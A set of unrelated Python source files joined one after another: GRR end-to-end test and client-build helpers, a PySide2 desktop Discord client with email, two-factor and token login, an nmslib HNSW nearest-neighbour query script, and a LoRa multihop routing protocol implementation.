"-config",
fleetspeak_configs.client_config,
])
def RunEndToEndTests(client_id: str,
server_config_path: str,
tests: Optional[Iterable[str]] = None,
manual_tests: Optional[Iterable[str]] = None):
"""Runs end to end tests on a given client."""
p = _StartComponent(
"grr_response_test.run_end_to_end_tests",
_GetServerComponentArgs(server_config_path) + _GetRunEndToEndTestsArgs(
client_id, server_config_path, tests=tests,
manual_tests=manual_tests))
if p.wait() != 0:
raise RuntimeError("RunEndToEndTests execution failed.")
def RunBuildTemplate(server_config_path: str,
component_options: Optional[ComponentOptions] = None,
version_ini: Optional[str] = None) -> str:
"""Runs end to end tests on a given client."""
output_dir = tempfile.mkdtemp()
def CleanUpTemplate():
shutil.rmtree(output_dir)
atexit.register(CleanUpTemplate)
options = dict(component_options or {})
if version_ini:
fd, version_ini_path = tempfile.mkstemp(".ini")
try:
os.write(fd, version_ini.encode("ascii"))
finally:
os.close(fd)
options["ClientBuilder.version_ini_path"] = version_ini_path
p = _StartComponent(
"grr_response_client_builder.client_build",
_GetServerComponentArgs(server_config_path) +
_ComponentOptionsToArgs(options) + ["build", "--output", output_dir])
if p.wait() != 0:
raise RuntimeError("RunBuildTemplate execution failed.")
return os.path.join(output_dir, os.listdir(output_dir)[0])
def RunRepackTemplate(
server_config_path: str,
template_path: str,
component_options: Optional[ComponentOptions] = None) -> str:
"""Runs 'grr_client_builder repack' to repack a template."""
output_dir = tempfile.mkdtemp()
def CleanUpInstaller():
shutil.rmtree(output_dir)
atexit.register(CleanUpInstaller)
p = _StartComponent(
"grr_response_client_builder.client_build",
_GetServerComponentArgs(server_config_path) +
_ComponentOptionsToArgs(component_options) +
["repack", "--template", template_path, "--output_dir", output_dir])
if p.wait() != 0:
raise RuntimeError("RunRepackTemplate execution failed.")
  # Repacking may apparently generate more than one file. Just select the
  # biggest one: it's guaranteed to be the repacked installer.
paths = [os.path.join(output_dir, fname) for fname in os.listdir(output_dir)]
sizes = [os.path.getsize(p) for p in paths]
_, biggest_path = max(zip(sizes, paths))
return biggest_path
def RunUploadExe(server_config_path: str,
exe_path: str,
platform_str: str,
component_options: Optional[ComponentOptions] = None) -> str:
"""Runs 'grr_config_upater upload_exe' to upload a binary to GRR."""
p = _StartComponent(
"grr_response_server.bin.config_updater",
_GetServerComponentArgs(server_config_path) +
_ComponentOptionsToArgs(component_options) + [
"upload_exe", "--file", exe_path, "--platform", platform_str,
"--upload_subdirectory", "test"
])
if p.wait() != 0:
raise RuntimeError("RunUploadExe execution failed.")
return "%s/test/%s" % (platform_str, os.path.basename(exe_path))
_PROCESS_CHECK_INTERVAL = 0.1
def _DieIfSubProcessDies(processes: Iterable[subprocess.Popen],
already_dead_event: threading.Event):
"""Synchronously waits for processes and dies if one dies."""
while True:
for p in processes:
if p.poll() not in [None, 0]:
# Prevent a double kill. When the main process exits, it kills the
# children. We don't want a child's death to cause a SIGTERM being
# sent to a process that's already exiting.
if already_dead_event.is_set():
return
# DieIfSubProcessDies runs in a background thread, raising an exception
# will just kill the thread while what we want is to fail the whole
# process.
print("Subprocess %s died unexpectedly. Killing main process..." %
p.pid)
for kp in processes:
try:
os.kill(kp.pid, signal.SIGTERM)
except OSError:
pass
# sys.exit only exits a thread when called from a thread.
# Killing self with SIGTERM to ensure the process runs necessary
# cleanups before exiting.
os.kill(os.getpid(), signal.SIGTERM)
time.sleep(_PROCESS_CHECK_INTERVAL)
def DieIfSubProcessDies(
processes: Iterable[subprocess.Popen]) -> threading.Thread:
"""Kills the process if any of given processes dies.
This function is supposed to run in a background thread and monitor provided
processes to ensure they don't die silently.
Args:
    processes: An iterable with subprocess.Popen instances.
Returns:
Background thread started to monitor the processes.
"""
already_dead_event = threading.Event()
t = threading.Thread(
target=_DieIfSubProcessDies, args=(processes, already_dead_event))
t.daemon = True
t.start()
def PreventDoubleDeath():
already_dead_event.set()
atexit.register(PreventDoubleDeath)
return t
def RunApiShellRawAccess(config: Text, exec_code: Text) -> None:
"""Runs exec_code in the API shell."""
p = _StartComponent(
"grr_response_server.bin."
"api_shell_raw_access",
["--config", config, "--exec_code", exec_code],
)
if p.wait() != 0:
raise Exception("api_shell_raw_access execution failed: {}".format(
p.returncode))
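# Hypothetical wiring sketch (not part of the original module): shows how the
# helpers above are typically combined for a self-contained run. The database
# name is a made-up placeholder, and obtaining the enrolled client id is only
# hinted at because it depends on api_helpers code not shown here.
def _ExampleSelfContainedRun():
  grr_configs = InitGRRConfigs("grr_selfcontained_test")
  server_processes = StartServerProcesses(grr_configs)
  client_process = StartClientProcess(grr_configs)
  DieIfSubProcessDies(server_processes + [client_process])
  # A real run would wait for the client to enroll, look up its client id via
  # the API and only then call:
  # RunEndToEndTests(client_id, grr_configs.server_config)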
|
baddiscord.py
|
from PySide2.QtWidgets import QApplication, QWidget, QLabel, QVBoxLayout, QHBoxLayout,\
QPushButton, QLineEdit, QSizePolicy, QMessageBox, QStyle, QToolBar, QMenu, QWidgetAction
from PySide2.QtCore import Qt
from PySide2.QtGui import QIcon, QWindow, QPalette
from qasync import QEventLoop, QThreadExecutor
import threading
import discord
import asyncio
import aiohttp # Instead of requests in favour of asyncio ability
import time
import json
import uuid
import os
class IOManager: ## Manages reading and writing data to files.
def __init__(self, file, start=True, jtype=True, binary=False):
'''
file:
type, string
Path to file to iomanage
start:
-- OPTIONAL --
type, boolean
default, True
Start operations thread on creation
jtype:
-- OPTIONAL --
type, boolean
default, True
File is json database
binary:
-- OPTIONAL --
type, boolean
default, False
Open file in binary read/write mode
'''
self.Ops = [] # Operations
self.Out = {} # Outputs
self.Reserved = [] # Reserved keys for operations
self.stopthread = False # Should stop operations thread
self.stopped = True # Is operations thread stopped
self.thread = None # Operation thread object
self.file = file # File to read/write
## Assigning open params to class
if binary: # Can not be json type and binary read/write
self.jtype = False
else:
self.jtype = jtype
self.binary = binary
# Create file if it doesn't already exist
if not os.path.isfile(file):
with open(file, "w+") as file:
if jtype:
file.write("{}")
if start: # start if kwarg start is True
self.Start()
    def GetId(self): # Method to get a probably-unique key
return uuid.uuid4()
def Read(self, waitforwrite=False, id=None): # Handles creating read operations
'''
waitforwrite:
-- OPTIONAL --
type, boolean
default, False
            Operations thread should wait for a write operation with the same id kwarg
Requires id kwarg to be set
id:
-- OPTIONAL --
type, uuid4
default, None
ID to identify this operation
'''
if not waitforwrite:
if id == None: id = uuid.uuid4() # get uuid if none passed
self.Ops.append({"type": "r", "wfw": False, "id": id}) # Add operation to list
else: # Wait for next write with same id
if id == None: # waitforwrite requires id
return None
# Check for duplicate ids
for x in self.Ops:
if x["id"] == id:
return None
if id in self.Reserved:
return None
# Reserve id
# Add operation to list
self.Reserved.append(id)
self.Ops.append({"type": "r", "wfw": True, "id": id})
while not id in self.Out: # Wait for read operation to complete
time.sleep(.01)
result = self.Out[id] # Get results
del self.Out[id] # Delete results from output
return result["data"] # return results
def Write(self, nd, id=None):
'''
nd:
type, string/bytes
New data to write to file
id:
-- OPTIONAL --
type, uuid
default, None
ID to identify this operation
'''
self.Ops.append({"type": "w", "d": nd, "id": id}) # Add write operation to list
def Start(self): # Start operations thread
if self.stopped: # Start only if thread not running
self.stopthread = False # Reset stopthread to avoid immediate stoppage
# Create thread and start
self.thread = threading.Thread(target=self.ThreadFunc)
self.thread.start()
def Stop(self): # Stop operations thread
if not self.stopthread: # Stop thread only if not already stopping
if not self.stopped: # Stop thread only if thread running
self.stopthread = True
def isStopped(self): # Test if operations thread not running
return self.stopped
def ThreadFunc(self): # Operations function
self.stopped = False # Reset stopped attr
# Read/write type, binary or not
t = None
if self.binary:
t = "b"
else:
t = ""
# Main loop
while not self.stopthread: # Test for stop attr
if len(self.Ops) > 0: # Test for new operations
# Get next operation
Next = self.Ops[0]
del self.Ops[0]
# Open file as 'type' (read/write) + t (binary/text)
with open(self.file, Next["type"]+t) as file:
id = Next["id"] # Operation ID
if Next["type"] == "r": # If is read operation
# Use json.load if in json mode
if self.jtype:
d = json.load(file)
else:
d = file.read()
# Put data in output
self.Out[id] = {"data": d, "id": id}
if Next["wfw"]: # Test if read operation is wait-for-write
# Wait for write loop
while not self.stopthread: # Test for stop attr
# Search for write operation with same id
op = None
                                for candidate in self.Ops:
                                    if candidate["id"] == id:
                                        op = candidate
                                        break
                                # If no matching write operation, wait and restart loop
                                if op is None:
time.sleep(.1)
continue
self.Reserved.remove(id) # Remove reserved id
self.Ops.remove(op) # Remove write operation from list
self.Ops.insert(0, op) # Place write operation first
break # Break wfw loop
continue # Continue to main loop start
elif Next["type"] == "w": # If is write operation
# Use json.dump if in json mode
if self.jtype:
json.dump(Next["d"], file, indent=4)
else:
file.write(Next["d"])
else: # If no operations, wait.
time.sleep(.1)
self.stopped = True # Set operation thread as stopped
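# Hypothetical usage sketch (not part of the original file): a read that is
# reserved for a follow-up write with the same id, so the operations thread
# keeps the pair together. "example.json" is a made-up file name.
def _iomanager_usage_example():
    manager = IOManager("example.json")
    op_id = manager.GetId()
    data = manager.Read(waitforwrite=True, id=op_id)  # blocks until the file is read
    data["LastRun"] = time.time()
    manager.Write(data, op_id)                        # completes the reserved pair
    manager.Stop()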
class LoginMenu(QWidget):
def switcher(self, nw):
self.cwidget.hide()
self.cwidget = nw
nw.show()
async def loginUserDetails(self, e, p):
self.setEnabled(False)
t = await c.getUserToken(e, p)
if t != None:
await self.loginToken(t, False)
else:
self.setEnabled(True)
async def loginToken(self, t, b):
self.setEnabled(False)
try:
await c.login(t, bot=b)
try:
id = io.GetId()
d = io.Read(True, id)
d["LoginDetails"]["Token"] = t
d["LoginDetails"]["BotUser"] = b
io.Write(d, id)
await discord.Client.connect(c)
except Exception as e:
c.Popup(str(e))
self.setEnabled(True)
except discord.errors.LoginFailure as e:
c.Popup("Token is incorrect.")
self.setEnabled(True)
except discord.errors.HTTPException as e:
c.Popup(str(e))
self.setEnabled(True)
def setupUserLogin(self):
ul = QWidget()
ull = QVBoxLayout()
ul.setLayout(ull)
## Back button
bbw = QWidget()
bbwl = QHBoxLayout()
bbw.setLayout(bbwl)
bb = QPushButton("<- Go Back")
bb.setStyleSheet("background-color: #ffffff;")
spacer = QWidget()
bbwl.addWidget(bb)
bbwl.addWidget(spacer)
bbwl.setStretchFactor(spacer, 5)
bb.clicked.connect(lambda: self.switcher(self.mm))
bb.clicked.connect(lambda: c.setFixedSize(450, 150))
ull.addWidget(bbw)
## Detail Fields
ew = QWidget()
pw = QWidget()
ewl = QHBoxLayout()
pwl = QHBoxLayout()
ew.setLayout(ewl)
pw.setLayout(pwl)
ewl.addWidget(QLabel("Email"))
pwl.addWidget(QLabel("Password"))
email = QLineEdit()
email.setStyleSheet("background-color: #ffffff;")
passw = QLineEdit()
passw.setEchoMode(QLineEdit.Password)
passw.returnPressed.connect(lambda: loop.create_task(self.loginUserDetails(email.text(), passw.text())))
passw.setStyleSheet("background-color: #ffffff;")
dlb = QPushButton("Login")
dlb.setStyleSheet("background-color: #ffffff;")
dlb.clicked.connect(lambda: loop.create_task(self.loginUserDetails(email.text(), passw.text())))
ewl.addWidget(email)
pwl.addWidget(passw)
ull.addWidget(ew)
ull.addWidget(pw)
ull.addWidget(dlb)
        ## Separator
ull.addWidget(QLabel("_______________________________________________________________________"))
## Token Login
tw = QWidget()
twl = QHBoxLayout()
tw.setLayout(twl)
token = QLineEdit()
token.returnPressed.connect(lambda: loop.create_task(self.loginToken(token.text(), False)))
token.setStyleSheet("background-color: #ffffff;")
tlb = QPushButton("Login")
tlb.setStyleSheet("background-color: #ffffff;")
tlb.clicked.connect(lambda: loop.create_task(self.loginToken(token.text(), False)))
twl.addWidget(QLabel("Token"))
twl.addWidget(token)
ull.addWidget(tw)
ull.addWidget(tlb)
# Align everything to top
squish = QWidget()
ull.addWidget(squish)
ull.setStretchFactor(squish, 100)
return ul
def setupBotLogin(self):
bl = QWidget()
bll = QVBoxLayout()
bl.setLayout(bll)
## Back button
bbw = QWidget()
bbwl = QHBoxLayout()
bbw.setLayout(bbwl)
bb = QPushButton("<- Go Back")
bb.setStyleSheet("background-color: #ffffff;")
spacer = QWidget()
bbwl.addWidget(bb)
bbwl.addWidget(spacer)
bbwl.setStretchFactor(spacer, 5)
bb.clicked.connect(lambda: self.switcher(self.mm))
bb.clicked.connect(lambda: c.setFixedSize(450, 150))
bll.addWidget(bbw)
## Token Login
tw = QWidget()
twl = QHBoxLayout()
tw.setLayout(twl)
token = QLineEdit()
token.returnPressed.connect(lambda: loop.create_task(self.loginToken(token.text(), True)))
token.setStyleSheet("background-color: #ffffff;")
tlb = QPushButton("Login")
tlb.setStyleSheet("background-color: #ffffff;")
tlb.clicked.connect(lambda: loop.create_task(self.loginToken(token.text(), True)))
twl.addWidget(QLabel("Token"))
twl.addWidget(token)
bll.addWidget(tw)
bll.addWidget(tlb)
# Align everything to top
squish = QWidget()
bll.addWidget(squish)
bll.setStretchFactor(squish, 5)
return bl
def __init__(self):
super().__init__()
l = QVBoxLayout()
self.setLayout(l)
title = QLabel("Login to BadDiscord")
title.setAlignment(Qt.AlignHCenter)
title.setStyleSheet("font: 18pt;")
l.addWidget(title)
self.mm = QWidget()
mml = QVBoxLayout()
self.mm.setLayout(mml)
ul = self.setupUserLogin()
bl = self.setupBotLogin()
ulb = QPushButton("Login as User")
blb = QPushButton("Login as Bot")
mml.addWidget(ulb)
ulb.setStyleSheet("background-color: #ffffff;")
blb.setStyleSheet("background-color: #ffffff;")
mml.addWidget(blb)
l.addWidget(ul)
l.addWidget(bl)
l.addWidget(self.mm)
ul.hide()
bl.hide()
self.cwidget = self.mm
ulb.clicked.connect(lambda: self.switcher(ul))
ulb.clicked.connect(lambda: c.setFixedSize(450, 350))
blb.clicked.connect(lambda: self.switcher(bl))
blb.clicked.connect(lambda: c.setFixedSize(450, 220))
# Align everything to top
squish = QWidget()
l.addWidget(squish)
l.setStretchFactor(squish, 5)
self.show()
class MainApp(QWidget):
def ScreenChanged(self, screen):
self.client.setMaximumSize(screen.size())
def addServerAction(self, text, function, args=[], kwargs={}):
action = QWidgetAction(self)
aButton = QPushButton(text)
aButton.clicked.connect(lambda: function(*args, **kwargs))
action.setDefaultWidget(aButton)
self.ServerActions.addAction(action)
def setupTopBar(self):
tb = QWidget()
tbl = QHBoxLayout()
tb.setLayout(tbl)
tb.setStyleSheet("border: 3px solid black; background-color: #7289da;")
tbl.setAlignment(Qt.AlignLeft)
homeBtn = QPushButton()
homeBtn.setIcon(self.client.ico)
saTB = QToolBar()
self.ServerActions = QMenu()
self.ServerActions.setTitle("⠀ Home ⠀")
saTB.addAction(self.ServerActions.menuAction())
tbl.addWidget(homeBtn)
tbl.addWidget(saTB)
saTB.setStyleSheet("border: 1px solid black;")
homeBtn.setStyleSheet("border: none;")
self.ServerActions.setStyleSheet("border: none;")
return tb
def __init__(self, parent):
super().__init__()
self.client = parent
parent.maw = self
parent.l.addWidget(self)
l = QVBoxLayout()
self.setLayout(l)
l.setAlignment(Qt.AlignTop)
tb = self.setupTopBar()
l.addWidget(tb)
parent.setMinimumSize(parent.size())
parent.setMaximumSize(parent.screen().size())
parent.screenChanged.connect(self.ScreenChanged)
parent.hide()
parent.setWindowFlag(Qt.CustomizeWindowHint)
parent.setWindowFlag(Qt.WindowMaximizeButtonHint)
parent.show()
self.show()
class Client(QWidget, QWindow, discord.Client):
def __init__(self):
QWidget.__init__(self)
QWindow.__init__(self)
discord.Client.__init__(self)
self.maw = None
self.ico = QIcon()
self.ico.addFile("./Assets/logo.jpg")
async def on_ready(self):
print("Logged in as " + self.user.name)
self.lm.hide()
del self.lm
self.setWindowTitle("BadDiscord -- " + self.user.name + " -- Bot User"\
if self.user.bot else "BadDiscord -- " + self.user.name)
self.setStyleSheet("background-color: #2c2f33;")
MainApp(self)
def Popup(self, text):
l = QMessageBox()
l.setText(text)
l.setWindowTitle("Login Failed")
l.setIcon(QMessageBox.Warning)
l.setWindowIcon(self.style().standardIcon(getattr(QStyle, "SP_MessageBoxWarning")))
l.show()
self.temp = l
async def getMFAToken(self, ticket, code):
if code == "":
self.Popup("Please enter your two-factor code.")
return None
payload = {
"code": code,
"gift_code_sku_id": None,
"login_source": None,
"ticket": ticket
}
async with self.bses.post("https://discordapp.com/api/v7/auth/mfa/totp", json=payload) as r:
r = await r.json()
if "token" not in r:
self.Popup(r["message"])
else:
return r["token"]
return None
async def loginWithMFAToken(self, w, code, ticket):
w.setEnabled(False)
token = await self.getMFAToken(ticket, code.text())
if token == None:
w.setEnabled(True)
else:
w.hide()
del w
await self.lm.loginToken(token, False)
async def mfaKeyGrab(self, ticket):
w = QWidget()
l = QVBoxLayout()
w.setLayout(l)
label = QLabel("Enter your Two-Factor Auth Code")
label.setStyleSheet("font: 15pt;")
code = QLineEdit()
code.setStyleSheet("background-color: #ffffff;")
lb = QPushButton("Login")
lb.setStyleSheet("background-color: #ffffff;")
l.addWidget(label)
l.addWidget(code)
l.addWidget(lb)
lb.clicked.connect(lambda: loop.create_task(self.loginWithMFAToken(w, code, ticket)))
w.show()
w.setFixedSize(w.size())
w.setWindowTitle("BadDiscord -- Two-Factor Verification")
w.setWindowIcon(self.ico)
w.setStyleSheet("background-color: #7289da;")
async def getUserToken(self, e, p):
payload = {
'email': e,
'password': p
}
async with self.bses.post('https://discordapp.com/api/v7/auth/login', json=payload) as r:
r = await r.json()
#await session.close()
if "token" in r and not "mfa" in r and not r["token"] == None:
return r["token"]
elif "errors" in r:
pt = ""
for key in r["errors"]:
if pt != "": pt += "\n"
pt += key.capitalize() + ": " + r["errors"][key]["_errors"][0]["message"] + "."
self.Popup(pt)
elif "captcha_key" in r:
self.Popup("Account with that email does not exist.")
else:
await self.mfaKeyGrab(r["ticket"])
return None
async def startClient(self):
self.bses = aiohttp.ClientSession(
loop=asyncio.get_event_loop(),
timeout=aiohttp.ClientTimeout(total=1)
)
self.l = QVBoxLayout()
self.setLayout(self.l)
self.lm = LoginMenu()
self.l.addWidget(self.lm)
self.l.setMargin(0)
self.setFixedSize(450, 150)
self.setWindowTitle("BadDiscord -- Login")
self.setWindowIcon(self.ico)
self.setStyleSheet("background-color: #7289da;")
self.show()
if __name__ == "__main__":
app = QApplication()
loop = QEventLoop(app)
asyncio.set_event_loop(loop)
c = Client()
io = IOManager("configs.json")
if io.Read() == {}:
# Write defaults to configs
io.Write({
"LoginDetails": {
"Token": None,
"BotUser": False,
}
})
# So we don't have to ensure loop is always running,
# Create task and run forever
with loop:
loop.create_task(c.startClient())
loop.run_forever()
io.Stop()
|
test_hnsw.py
|
import numpy
import sys
import nmslib
import time
import math
from multiprocessing import Process
def write_knn_out(out_dir,write_dist,num_inst,nbrs,batch_no,metric_space):
with open('%s/%d'%(out_dir,batch_no),'w') as fp:
fp.write('%d %d\n'%(len(nbrs),num_inst))
if write_dist == 1:
for j in range(0,len(nbrs)):
temp = {}
flag = 0
for k in range(0,len(nbrs[j][0])):
if metric_space == 'l2':
temp[nbrs[j][0][k]] = nbrs[j][1][k]
else:
temp[nbrs[j][0][k]] = 1-nbrs[j][1][k]
for t in sorted(temp):
if flag ==0:
fp.write('%d:%f'%(t,temp[t]))
flag = 1
else:
fp.write(' %d:%f'%(t,temp[t]))
fp.write('\n')
else:
for j in range(0,len(nbrs)):
temp = {}
flag = 0
for k in range(0,len(nbrs[j][0])):
temp[nbrs[j][0][k]] = 1
for t in sorted(temp):
if flag ==0:
fp.write('%d'%(t))
flag = 1
else:
fp.write(' %d'%(t))
fp.write('\n')
tst_ft_file = sys.argv[1]
model_file = sys.argv[2]
num_ft = int(sys.argv[3])
num_lbls = int(sys.argv[4])
efS = int(sys.argv[5])
num_nbrs = int(sys.argv[6])
write_dist = int(sys.argv[7])
out_dir = sys.argv[8]
num_thread = int(sys.argv[9])
num_out_threads = int(sys.argv[10])
metric_space = sys.argv[11]
index = nmslib.init(method='hnsw', space=metric_space)
nmslib.loadIndex(index,model_file)
index.setQueryTimeParams({'efSearch': efS, 'algoType': 'old'})
start = time.time()
fp = open(tst_ft_file,'rb')
fp.seek(8)
query = numpy.fromfile(fp,dtype=numpy.float32,count=-1,sep='')
query = numpy.reshape(query,(int(len(query)/num_ft),num_ft))
fp.close()
end = time.time()
start = time.time()
nbrs = index.knnQueryBatch(query, k=num_nbrs, num_threads = num_thread)
end = time.time()
print('Time taken to find approx nearest neighbors = %f'%(end-start))
batch_size = int(math.ceil(float(len(nbrs))/float(num_out_threads)))
for i in range(num_out_threads):
Process(target=write_knn_out, args=(out_dir,write_dist,num_lbls,nbrs[i*batch_size:min((i+1)*batch_size,len(nbrs))],i,metric_space)).start()
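# Hypothetical invocation sketch (not part of the original script); the argument
# order mirrors the sys.argv parsing above, and the file names and sizes are
# made-up values:
#   python test_hnsw.py tst_X.bin model.bin 5000 312330 300 10 1 out_dir 16 4 cosinesimil
#   (test features, model file, #features, #labels, efSearch, #neighbours,
#    write-distances flag, output dir, query threads, writer processes, metric space)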
|
protocol.py
|
import base64
import logging
import random
import signal
import threading
import time
import traceback
from queue import Queue
from contextlib import contextmanager
from lora_multihop import ipc, serial_connection, header, variables
from lora_multihop.header import RegistrationHeader, ConnectRequestHeader, DisconnectRequestHeader
from lora_multihop.routing_table import RoutingTable
__author__ = "Marvin Rausch"
class Protocol:
PROCESS_INCOMING_MESSAGES = True
VERIFICATION_TIMEOUT = 25
PAUSE_PROCESSING_INCOMING_MESSAGES = False
MESSAGES_ACKNOWLEDGMENT = []
def __init__(self):
logging.info('created protocol obj: {}'.format(str(self)))
self.routing_table = RoutingTable()
self.received_messages_queue = Queue()
self.sending_messages_queue = Queue()
self.sending_queue = Queue()
self.connected_node = None
self.message_counter = 0
self.received_own_registration_message = False
def start_protocol_thread(self):
"""
starts new thread which processes incoming messages in background
"""
receiving_thread = threading.Thread(target=self.process_incoming_message)
receiving_thread.start()
def send_header(self, header_str):
"""
sends a string to LoRa network
@param header_str: message to send
"""
wait_random_time()
serial_connection.writing_q.put(('AT+SEND={}'.format(str(len(header_str))), ['AT,OK']))
if serial_connection.status_q.get(timeout=self.VERIFICATION_TIMEOUT):
serial_connection.writing_q.put((header_str, ['AT,SENDING', 'AT,SENDED']))
if serial_connection.status_q.get(timeout=self.VERIFICATION_TIMEOUT):
logging.debug("sent header '{}'.".format(header_str))
return
logging.debug("could not send header '{}', because got invalid status from lora module".format(header_str))
def process_incoming_message(self):
"""
get messages from LoRa module, create header object and call appropriate method to process the received message
"""
while self.PROCESS_INCOMING_MESSAGES:
if not serial_connection.response_q.empty() and not self.PAUSE_PROCESSING_INCOMING_MESSAGES:
raw_message = serial_connection.response_q.get()
logging.debug(f'process: {raw_message}')
try:
header_obj = header.create_header_obj_from_raw_message(raw_message)
if header_obj.ttl > 1:
self.routing_table.add_neighbor_to_routing_table(header_obj)
if header_obj.flag == header.RouteRequestHeader.HEADER_TYPE:
self.process_route_request(header_obj)
elif header_obj.flag == header.MessageHeader.HEADER_TYPE:
self.process_message_header(header_obj)
elif header_obj.flag == header.RouteReplyHeader.HEADER_TYPE:
self.process_route_reply_header(header_obj)
elif header_obj.flag == header.RouteErrorHeader.HEADER_TYPE:
self.process_route_error_header(header_obj)
elif header_obj.flag == header.MessageAcknowledgeHeader.HEADER_TYPE:
self.process_ack_header(header_obj)
elif header_obj.flag == header.RegistrationHeader.HEADER_TYPE:
self.process_registration_header(header_obj)
elif header_obj.flag == header.ConnectRequestHeader.HEADER_TYPE:
self.process_connect_request_header(header_obj)
elif header_obj.flag == header.DisconnectRequestHeader.HEADER_TYPE:
self.process_disconnect_request_header(header_obj)
except ValueError as e:
logging.warning(str(e))
traceback.print_exc()
try:
logging.debug('try to add received signal to unsupported devices list...')
addr = header.get_received_from_value(raw_message)
self.routing_table.add_neighbor_with_unsupported_protocol(addr)
except ValueError as e:
logging.warning(str(e))
def send_message(self, payload):
"""
send message to currently connected peer
@param payload: message to send as bytes
"""
if self.connected_node is not None:
destination = self.connected_node
best_route = self.routing_table.get_best_route_for_destination(destination)
if len(best_route) == 0:
logging.info('could not find a route to {}. Sending route request...'.format(destination))
if self.send_route_request_message(destination):
best_route = self.routing_table.get_best_route_for_destination(destination)
else:
                    logging.info('Got no answer on route request for {}.'.format(destination))
return
self.message_counter += 1
header_obj = header.MessageHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, destination,
best_route['next_node'], self.message_counter,
base64.b64encode(payload).decode(variables.ENCODING))
attempt = 0
self.add_message_to_waiting_acknowledgement_list(header_obj)
message_confirmed = False
while attempt < 3 and not message_confirmed:
logging.debug(f'attempt: {attempt}')
self.send_header(header_obj.get_header_str())
attempt_count_received_ack = 0
while attempt_count_received_ack < 10:
if header_obj.message_id not in self.MESSAGES_ACKNOWLEDGMENT:
message_confirmed = True
break
else:
time.sleep(0.5)
attempt_count_received_ack += 1
if message_confirmed:
break
else:
attempt += 1
if message_confirmed:
print('*******************message was acknowledged by receiver*******************')
else:
logging.debug(
f'message was not acknowledged by receiver. Current ack_list: {self.MESSAGES_ACKNOWLEDGMENT}'
f'\nSending route error message')
self.routing_table.delete_all_entries_of_destination(destination)
self.delete_from_ack_list(header_obj.message_id)
self.send_header(header.RouteErrorHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL,
header_obj.destination).get_header_str())
def send_route_request_message(self, end_node):
"""
sends route request
@param end_node: node for which a route is required
@return: True, if route request was confirmed, else False
"""
route_request_header_obj = header.RouteRequestHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, 0,
end_node)
attempt = 0
message_confirmed = False
while attempt < 3 and not message_confirmed:
logging.debug('attempt: {}'.format(attempt))
self.send_header(route_request_header_obj.get_header_str())
check_request_attempt_count = 0
while check_request_attempt_count < 10:
if len(self.routing_table.get_best_route_for_destination(end_node)) != 0:
logging.debug('new route for {} found'.format(end_node))
message_confirmed = True
break
else:
time.sleep(0.5)
check_request_attempt_count += 1
attempt += 1
if message_confirmed:
return message_confirmed
else:
attempt += 1
return message_confirmed
def process_route_request(self, header_obj):
"""
processes received route request header
@param header_obj: route request header object
"""
# first of all check whether source of route request is myself (to prevent cycle)
if header_obj.source != variables.MY_ADDRESS:
# look whether requested node is myself
if header_obj.end_node == variables.MY_ADDRESS:
logging.debug('add new routing table entry before sending route reply')
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from,
header_obj.hops + 1)
logging.info('sending route reply message...')
self.send_route_reply(next_node=header_obj.received_from, end_node=header_obj.source)
else:
if len(self.routing_table.get_best_route_for_destination(header_obj.source)) == 0:
# if there is no entry for source of route request, you can add routing table entry
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from,
header_obj.hops)
header_obj.ttl = header_obj.ttl - 1
header_obj.hops = header_obj.hops + 1
if not self.routing_table.check_route_request_already_processed(header_obj.end_node):
logging.debug('forward route request message')
self.routing_table.add_address_to_processed_requests_list(header_obj.end_node)
self.send_header(header_obj.get_header_str())
else:
logging.debug('route request was already processed')
def send_route_reply(self, next_node, end_node):
"""
sends route reply message
@param next_node: next receiver of the message, which should forward the message to the destination node
@param end_node: node which sent the route request
"""
route_reply_header_obj = header.RouteReplyHeader(None, variables.MY_ADDRESS, variables.DEFAULT_TTL, 0, end_node,
next_node)
self.send_header(route_reply_header_obj.get_header_str())
def process_message_header(self, header_obj):
"""
        processes a received message header; if the end node of the message is this node the message will be put
into the received_messages queue to forward the message via IPC to the Java side; else the message will be
forwarded to the next_node
@param header_obj: message header object
"""
if header_obj.destination == variables.MY_ADDRESS and header_obj.source == self.connected_node:
ack_header_str = header.MessageAcknowledgeHeader(None, variables.MY_ADDRESS, variables.TTL_START_VALUE,
header_obj.source, header_obj.message_id).get_header_str()
if self.routing_table.check_message_already_received(header_obj.source, header_obj.message_id):
self.send_header(ack_header_str)
else:
logging.debug(f'payload: {str(header_obj.payload)}')
self.received_messages_queue.put(base64.b64decode(header_obj.payload))
# send acknowledge message
logging.debug('sending acknowledgement')
self.send_header(ack_header_str)
elif header_obj.next_node == variables.MY_ADDRESS and header_obj.destination != variables.MY_ADDRESS:
best_route = self.routing_table.get_best_route_for_destination(header_obj.destination)
if len(best_route) == 0:
logging.info('no routing table entry for {} to forward message found'.format(header_obj.next_node))
else:
header_obj.next_node = best_route['next_node']
logging.info('forwarding message from {source} to {destination} over hop {next_node}'.format(
source=header_obj.source, destination=header_obj.destination, next_node=header_obj.next_node))
header_obj.ttl = header_obj.ttl - 1
self.send_header(header_obj.get_header_str())
else:
logging.debug('ignoring message: {}'.format(str(header_obj)))
def process_route_reply_header(self, header_obj):
"""
processes route reply header; if the source address is equal to the own address the message will be rejected;
if the destination address is equal to the own address a new route will be added to the routing table, else
the message will be forwarded to the address mentioned in the next_node field
@param header_obj: route reply header object
"""
if header_obj.source == variables.MY_ADDRESS:
return
if header_obj.end_node == variables.MY_ADDRESS:
# add entry to routing table
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from, header_obj.hops + 1)
elif header_obj.next_node == variables.MY_ADDRESS:
if len(self.routing_table.get_best_route_for_destination(header_obj.source)) != 0:
# forward route reply message
# add routing table entry
logging.debug("add routing table entry before forwarding route reply message")
self.routing_table.add_routing_table_entry(header_obj.source, header_obj.received_from,
header_obj.hops + 1)
# forward message
header_obj.next_node = self.routing_table.get_best_route_for_destination(header_obj.end_node)[
'next_node']
header_obj.hops = header_obj.hops + 1
header_obj.ttl = header_obj.ttl - 1
self.send_header(header_obj.get_header_str())
def process_route_error_header(self, header_obj):
"""
processes route error header; node will be deleted from routing table
@param header_obj: route error header object
"""
if header_obj.broken_node in self.routing_table.get_list_of_all_available_destinations():
logging.debug(f'received route error. Remove {header_obj.broken_node} from routing table')
self.routing_table.delete_all_entries_of_destination(header_obj.broken_node)
else:
logging.debug(
f'broken node is not in available nodes: {self.routing_table.get_list_of_all_available_destinations()}')
header_obj.ttl -= 1
